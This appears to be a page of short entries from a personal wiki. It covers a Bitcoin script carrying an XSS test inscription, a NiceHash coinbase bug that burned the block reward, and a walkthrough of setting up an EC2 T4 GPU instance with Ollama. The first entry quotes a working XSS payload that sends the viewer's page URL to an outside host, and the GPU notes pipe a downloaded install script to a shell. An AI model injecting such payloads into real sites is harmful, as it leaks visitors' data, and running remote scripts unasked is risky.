Output 0 does:
OP_ADD OP_ADD 13 OP_EQUAL OP_NOTIF OP_RETURN OP_ENDIF OP_FROMALTSTACK <large xss constant> OP_DROP
where the large constant is an interesting inscription to test for the presence of XSS attacks on blockchain explorers:
<script type='text/javascript'>document.write('<img src='http://www.trollbot.org/xss-blockchain-detector.php?href=' + location.href + ''>');</script>`
This is almost spendable with:
1 OP_TOALTSTACK 10 1 2
but that fails because the altstack is cleared between the input and the output script, so this output is provably unspendable.
Malandragem Updated 2025-07-16
In this malformed Coinbase transaction, the mining pool "nicehash" produced a provably unspendable Bitcoin output script due to a bug, and therefore lost most of the entire block reward of 6.25 BTC then worth about $ 123,000.
The output is unspendable because it ends in a constant 0, the disassembly of the first and main output is this series of constants:
0 017fed86bba5f31f955f8b316c7fb9bd45cb6cbc 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
and for the second smaller one:
aa21a9ed62ec16bf1a388c7884e9778ddb0e26c0bf982dada47aaa5952347c0993da 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
the third one being an OP_RETURN message.
Billy Mitchell (gamer) Updated 2025-07-16
Video 1.
When Cartoon Network Destroyed Billy Mitchell by Karl Jobst
. Source.
U-Math Updated 2025-07-16
Amazon EC2 GPU Updated 2025-07-16
As of December 2023, the cheapest instance with an Nvidia GPU is g4nd.xlarge, so let's try that out. In that instance, lspci contains:
00:1e.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)
so we see that it runs a Nvidia T4 GPU.
Be careful not to confuse it with g4ad.xlarge, which has an AMD GPU instead. TODO meaning of "ad"? "a" presumably means AMD, but what is the "d"?
Some documentation on which GPU is in each instance can seen at: docs.aws.amazon.com/dlami/latest/devguide/gpu.html (archive) with a list of which GPUs they have at that random point in time. Can the GPU ever change for a given instance name? Likely not. Also as of December 2023 the list is already outdated, e.g. P5 is now shown, though it is mentioned at: aws.amazon.com/ec2/instance-types/p5/
When selecting the instance to launch, the GPU does not show anywhere apparently on the instance information page, it is so bad!
Also note that this instance has 4 vCPUs, so on a new account you must first make a customer support request to Amazon to increase your limit from the default of 0 to 4, see also: stackoverflow.com/questions/68347900/you-have-requested-more-vcpu-capacity-than-your-current-vcpu-limit-of-0, otherwise instance launch will fail with:
You have requested more vCPU capacity than your current vCPU limit of 0 allows for the instance bucket that the specified instance type belongs to. Please visit aws.amazon.com/contact-us/ec2-request to request an adjustment to this limit.
When starting up the instance, also select:
Once you finally managed to SSH into the instance, first we have to install drivers and reboot:
sudo apt update
sudo apt install nvidia-driver-510 nvidia-utils-510 nvidia-cuda-toolkit
sudo reboot
and now running:
nvidia-smi
shows something like:
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 525.147.05   Driver Version: 525.147.05   CUDA Version: 12.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            Off  | 00000000:00:1E.0 Off |                    0 |
| N/A   25C    P8    12W /  70W |      2MiB / 15360MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+
From there basically everything should just work as normal. E.g. we were able to run a CUDA hello world just fine along:
nvcc inc.cu
./a.out
One issue with this setup, besides the time it takes to setup, is that you might also have to pay some network charges as it downloads a bunch of stuff into the instance. We should try out some of the pre-built images. But it is also good to know this pristine setup just in case.
We then managed to run Ollama just fine with:
curl https://ollama.ai/install.sh | sh
/bin/time ollama run llama2 'What is quantum field theory?'
which gave:
0.07user 0.05system 0:16.91elapsed 0%CPU (0avgtext+0avgdata 16896maxresident)k
0inputs+0outputs (0major+1960minor)pagefaults 0swaps
so way faster than on my local desktop CPU, hurray.
After setup from: askubuntu.com/a/1309774/52975 we were able to run:
head -n1000 pap.txt | ARGOS_DEVICE_TYPE=cuda time argos-translate --from-lang en --to-lang fr > pap-fr.txt
which gave:
77.95user 2.87system 0:39.93elapsed 202%CPU (0avgtext+0avgdata 4345988maxresident)k
0inputs+88outputs (0major+910748minor)pagefaults 0swaps
so only marginally better than on P14s. It would be fun to see how much faster we could make things on a more powerful GPU.
Hunt Updated 2025-07-16
These were found by running object detection software for some porn/nudity detection. We need to run some more, all sex was likely missed: github.com/GantMan/nsfw_model/issues/160

There are unlisted articles, also show them or only show them.